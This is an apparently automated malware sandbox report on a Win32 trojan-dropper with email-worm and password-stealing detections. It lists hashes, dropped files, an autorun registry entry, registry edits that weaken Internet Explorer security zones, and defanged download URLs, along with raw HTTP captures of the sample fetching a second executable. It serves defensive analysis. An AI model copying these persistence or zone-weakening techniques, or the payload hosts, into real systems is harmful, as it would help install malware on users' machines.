Trojan-Dropper.Win32.Sysn.azxe (Kaspersky), Gen:Variant.Zusy.110367 (B) (Emsisoft), Gen:Variant.Zusy.110367 (AdAware), Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, mzpefinder_pcap_file.YR, GenericEmailWorm.YR, TrojanFlyStudio.YR (Lavasoft MAS)Behaviour: Trojan-Dropper, Trojan-PSW, Trojan, Worm, EmailWorm
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 56ddb80a1ebb19055c510bfca1f92294
SHA1: 4372065e8372954bf97fc670fa6e36a190a5f705
SHA256: 1adca530705c1432066dde89570f22492124642524e73c60221d29db6d88198f
SSDeep: 49152:SEAlc zI4R961HNq 89ZYhqtg2hB9VXfBwvBoVinSofdD4oUZCVinSofdD4oUZU:0d zf3Wy62AnSoFDRAnSoFD6AnSoFDf
Size: 4952064 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftWindowsShortcutfile, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-03 06:47:24
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| EmailWorm | Worm can send e-mails. |
Process activity
The Trojan creates the following process(es):
setup.exe:1836
taskkill.exe:916
%original file name%.exe:1616
regedit.exe:572
The Trojan injects its code into the following process(es):No processes have been created.
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process setup.exe:1836 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2E221QAM\OEM[1].htm (17 bytes)
C:\oem (34 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\A781Y74F\conv[1].txt (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@100public[1].txt (219 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Cookies\Current_User@doudousoft[1].txt (0 bytes)
The process %original file name%.exe:1616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\setup.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Desktop\ÃÂÂøÖ·µ¼º½.lnk (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX45Y581\wang[1].htm (25 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@doudousoft[1].txt (207 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (400 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PX45Y581\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2E221QAM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\URYRI5ET\config[1].htm (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\URYRI5ET\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\A781Y74F\desktop.ini (67 bytes)
Registry activity
The process setup.exe:1836 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Internet Explorer\International]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E 10 87 E3 B3 D8 26 ED 59 6F AF A1 13 E1 76 36"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process taskkill.exe:916 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 A1 75 48 17 B1 AA 0F FE E5 61 2D D8 09 6C 18"
The process %original file name%.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32]
"(Default)" = "%System%\oleacc.dll"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 75 98 74 C6 C9 2D CE 12 D9 C0 1B F5 D5 05 D6"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.2345.com/?26263"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Play_Background_Sounds" = "yes"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"smss" = "c:\smss.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regedit.exe:572 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 3D C8 0A 22 96 27 A2 EE 9E 2C 63 5B DC 0E 79"
Dropped PE files
| MD5 | File path |
|---|---|
| e4e325e3dbcb186124574f00f8676688 | c:\setup.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Static Analysis
VersionInfo
Company Name: ????
Product Name: ????
Product Version: 1.0.0.0
Legal Copyright: ???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.0.0.0
File Description: ????
Comments: ????
Language: English (United States)
Company Name: ????Product Name: ????Product Version: 1.0.0.0Legal Copyright: ???? ????Legal Trademarks: Original Filename: Internal Name: File Version: 1.0.0.0File Description: ????Comments: ????Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 758451 | 761856 | 4.4944 | a9933e2590e237584ef6cd1dbf82471f |
| .rdata | 765952 | 3985990 | 3989504 | 4.99757 | e7026a65a6b3e3cd3c8b090ed127f82f |
| .data | 4755456 | 283752 | 73728 | 3.79412 | 9bd8d7bcc528174b74da5eaf9e1079bd |
| .rsrc | 5042176 | 122304 | 122880 | 2.88752 | c96d774d59c0ca7f998209e0aeb9ade6 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://56.doudousoft.com/ini/liuliang/wang.html | 222.191.251.197 |
| hxxp://56.doudousoft.com/updata/305344326303316304274376/wang.exe | 222.191.251.197 |
| hxxp://validate.100public.com.cname.yunjiasu-cdn.net/conv.txt?.6889612123456789 | 162.159.208.103 |
| hxxp://validate.100public.com.cname.yunjiasu-cdn.net/API/OEM.php?sid=5&vid=8460ee7933ad3399774fd7d5e2350863&_=.30037651234567 | 162.159.208.103 |
| hxxp://validate.100public.com/API/OEM.php?sid=5&vid=8460ee7933ad3399774fd7d5e2350863&_=.30037651234567 | 162.159.208.103 |
| hxxp://56.doudousoft.com/updata/......../wang.exe | 222.191.251.197 |
| hxxp://56.doudousoft.com/ini/liuliang/config.html | 222.191.251.197 |
| hxxp://validate.100public.com/conv.txt?.6889612123456789 | 162.159.208.103 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1545828-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:55 GMT
Content-Length: 1030556
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 1545828-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
.................................f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f.........................................................................................................................................................................................................................`................................................................................................................................................................................................................................................................................................................................................................................................................................................................................%B...............................................................fHTTP/1.1 206 Partial Content..Connection: close..Date: Thu, 23 Jul 2015 08:08:55 GMT..Content-Length: 1030556..Content-Type: application/octet-stream..Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe..Content-Range: bytes 1545828-2576383/2576384..Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT..Accept-Ranges: bytes..ETag: "af2c7ef4d9e1cf1:509e"..Server: IIS..X-Powered-By: WAF/2.0...................................f...f...f...f...f...f...f...f...f...f...f...f
<<< skipped >>>
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=1803466-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:51 GMT
Content-Length: 772918
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 1803466-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
...........................f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f..............3T...........................................................*..<a..W}..u....................................................................................}R..f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f.@............3T..................................0Q..;a..u...............................................................................\...?...?............................}R..f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f.......................*..<a..f...u...........................................................................j...\...#...#...#...$...$...$...$...$...$...#...w....................m%..f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...f...g.................0....................................................................w...\...1...#...#...$...$...$...$...$...$...$...$...$...$...$...$...$...$...#....................HTTP/1.1 206 Partial Content..Connection: close..Date: Thu, 23 Jul 2015 08:08:51 GMT..Content-Length: 772918..Content-Type: application/octet-stream..Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe..Content-Range: bytes 1803466-2576383/2576384..Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT..Accept-Ranges: bytes..ETag: "af2c7ef4d9e1cf1:509e"..Server: IIS..X-Powered-By: WAF/2.0.............................f...f...f...f...f...f...f...f...f...f...f...f
<<< skipped >>>
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Connection: close
Date: Thu, 23 Jul 2015 08:08:42 GMT
Content-Length: 2576384
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pI..4(..4(..4(..O4..1(..b7...(...4...(.......(..4(...*..V7../(...7..'(.......(...7..g(..4(...(......5(..Rich4(..........................PE..L....U3T..........................................@..........................`*.................................................@.....#.hW...........................................................................................................text............................... ..`.rdata........... ..................@..@.data...............................@....rsrc...hW....#..`..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
<<< skipped >>>
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=2061104-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:09:03 GMT
Content-Length: 515280
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 2061104-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=257638-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:51 GMT
Content-Length: 2318746
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 257638-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
....Y.C.3...~2.D$8.O.PQ...L.....}..V.E.B..|...C.;.|...u..T$<.....k..L$..D$0.....D$..9\..~...3..L$(_^][d........$..........j.h&.K.d.....Pd.%..........SU..VW.L$..6....E...$.........H..P..D...L$.P.4.....$......$........$....SV.T$8QRP...........t#.L$...$.........D$..9\..............D$0...........$....;.......u...$.........D$..9\........$....SVQ...-........tT..u......B.PS.t.....$.....D$0;.t....Q...RS.7...P..$....P.........u...$.....D$0;.|......@....U..H..z.;.}E..$......$....SR.P..@.QRP...^....L$.....$.........D$..9\.........3....L$4......E...$......H..P..D...L$4P..........D$LW.Q.P...|$..T$P.%......D$.t;..9\..L$4..$......t$4.c....L$...$.........t$..K....D$........$........$....WQ.H.RQ.T$XSR....................D$H..$.....D$..1..ti.U..F.;B.|V.N..T$..G...RP...}......D$...T....L$..T$..F.QSRPW..........D$...1....6...|$..D$...u............L$.SQ...'.......ub.U..B.PS..S...D$.f....f.C....{....p..K..U.....J...S........D$.......M..Q..H..L...T$.R...........t6..9\..L$4..$......t$4......L$...$.........t$.........S.D$..E<...L$..V..F.j.QRP.........9\..L$4..$......tHTTP/1.1 206 Partial Content..Connection: close..Date: Thu, 23 Jul 2015 08:08:51 GMT..Content-Length: 2318746..Content-Type: application/octet-stream..Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe..Content-Range: bytes 257638-2576383/2576384..Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT..Accept-Ranges: bytes..ETag: "af2c7ef4d9e1cf1:509e"..Server: IIS..X-Powered-By: WAF/2.0......Y.C.3...~2.D$8.O.PQ...L.....}..V.E.B..|...C.;.|...u..T$<.....k..L
<<< skipped >>>
GET /conv.txt?.6889612123456789 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: validate.100public.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Jul 2015 08:08:54 GMT
Content-Type: text/plain
Content-Length: 1521
Connection: keep-alive
Set-Cookie: __cfduid=d95da6de3325bdf9955353bba832f874e1437638933; expires=Fri, 22-Jul-16 08:08:53 GMT; path=/; domain=.100public.com; HttpOnly
Content-Encoding: gzip
Last-Modified: Mon, 23 Mar 2015 05:11:02 GMT
Accept-Ranges: bytes
ETag: "4019fc22765d01:0"
Vary: Accept-Encoding
X-Powered-By: ASP.NET
ServerTag: G2S3
Server: yunjiasu-nginx
CF-RAY: 20a5e6680c5e0f45-FRA
.............`.I.%&/m.{.J.J..t...`.$..@.........iG#).*..eVe]f.@......{....{....;.N'...?\fd.l..J...!....?~|.?".........{?...............v.N.y~0=8.t.Mf...............8...?...........?...............,..x.<..f..w.>....[................$..|.g..f.l..l?.t...t.6}x?......o..........{.>........d..._...S...O.f3...3...6..Oww....{0.....N.....~.....i...Sn......s....O'.....Nvf.~.;...:;?...zN..................!3..w..d.Ow.........;.W~. .1...?._.m....'..?398.wp...d.h.o...y~...............}K.{{.............w.f;.O.=x.i.p....Z................t..~6.7{..g4..........YNTy........w.y....w.g...._.m.............e..;....:..7...lr?#.....?._...................I.O&;...,..=".......|w7..p......'.y..?......_$.....................w.......O.....iv>;.~:.......wp....}.3;^.;.........L.&;.<...3y.O.?.?....^............L.3".....f.?..=..!........./..?.?.c.\..O.Y~.A>#ZL&.9...t......;..l.....=...{....1.......dr.K..4.>....x.w.|6....v.......`..`w.0....#}H........<...g.Y>.>...t2..>...w..tB.Dk.~@.......Lg....|.............|z...;.....Q.d.........{.,.G.p.O..J../h...O............g{.v.......4.{S.. ..7.............................*6..|....l2...<xx...`.>.....]H..V......g...............?x..p.p:y0...C{;....{;.v.;.ij....... .'..f..L_...M..?x....LH......?8xH.@.x(.`f].$.......|...9.Xv...`g....4.F.......Ow'...t..~.i....'.q.7....._0...M?=.......{{.3..{...{....?.0.4....H~.S......k9....H..Lv.Owx.........N..................9..s.).O/<..{...........'.{........M...O.....Pk..?........?..............?......?...s......S..?...l.......l.r0.9.
<<< skipped >>>
GET /API/OEM.php?sid=5&vid=8460ee7933ad3399774fd7d5e2350863&_=.30037651234567 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: validate.100public.com
Connection: Keep-Alive
Cookie: __cfduid=d95da6de3325bdf9955353bba832f874e1437638933
HTTP/1.1 200 OK
Date: Thu, 23 Jul 2015 08:08:54 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.28
X-Powered-By: ASP.NET
ServerTag: G2S3
Server: yunjiasu-nginx
CF-RAY: 20a5e66c8ce20f45-FRA
Content-Encoding: gzip
21............242VPP.K-*....K.M........a....F.f.......0..HTTP/1.1 200 OK..Date: Thu, 23 Jul 2015 08:08:54 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.3.28..X-Powered-By: ASP.NET..ServerTag: G2S3..Server: yunjiasu-nginx..CF-RAY: 20a5e66c8ce20f45-FRA..Content-Encoding: gzip..21............242VPP.K-*....K.M........a....F.f.......0..
GET /updata/......../wang.exe HTTP/1.1
Host: 56.doudousoft.com
Accept: */*
Referer: hXXp://56.doudousoft.com/updata/........
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Range: bytes=772914-
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 206 Partial Content
Connection: close
Date: Thu, 23 Jul 2015 08:08:50 GMT
Content-Length: 1803470
Content-Type: application/octet-stream
Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe
Content-Range: bytes 772914-2576383/2576384
Last-Modified: Tue, 07 Oct 2014 02:54:04 GMT
Accept-Ranges: bytes
ETag: "af2c7ef4d9e1cf1:509e"
Server: IIS
X-Powered-By: WAF/2.0
...(.]..2......M.......M.......P.].........u........M..C....M............].........M..$......].........M..A-...(.].........M..--...M...<.0....P.]..........M.........].........M.....2....M... .'......]..p......]..f......M..........M... ......0.]..D....`.]..:........]...........].."......h.]...........].........M.........].........M.......@.].........M.......h.].........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................HTTP/1.1 206 Partial Content..Connection: close..Date: Thu, 23 Jul 2015 08:08:50 GMT..Content-Length: 1803470..Content-Type: application/octet-stream..Content-Location: hXXp://56.doudousoft.com/updata/......../wang.exe..Content-Range: bytes 772914-2576383/2576384..Last-Modified: Tue, 07 Oct 2014 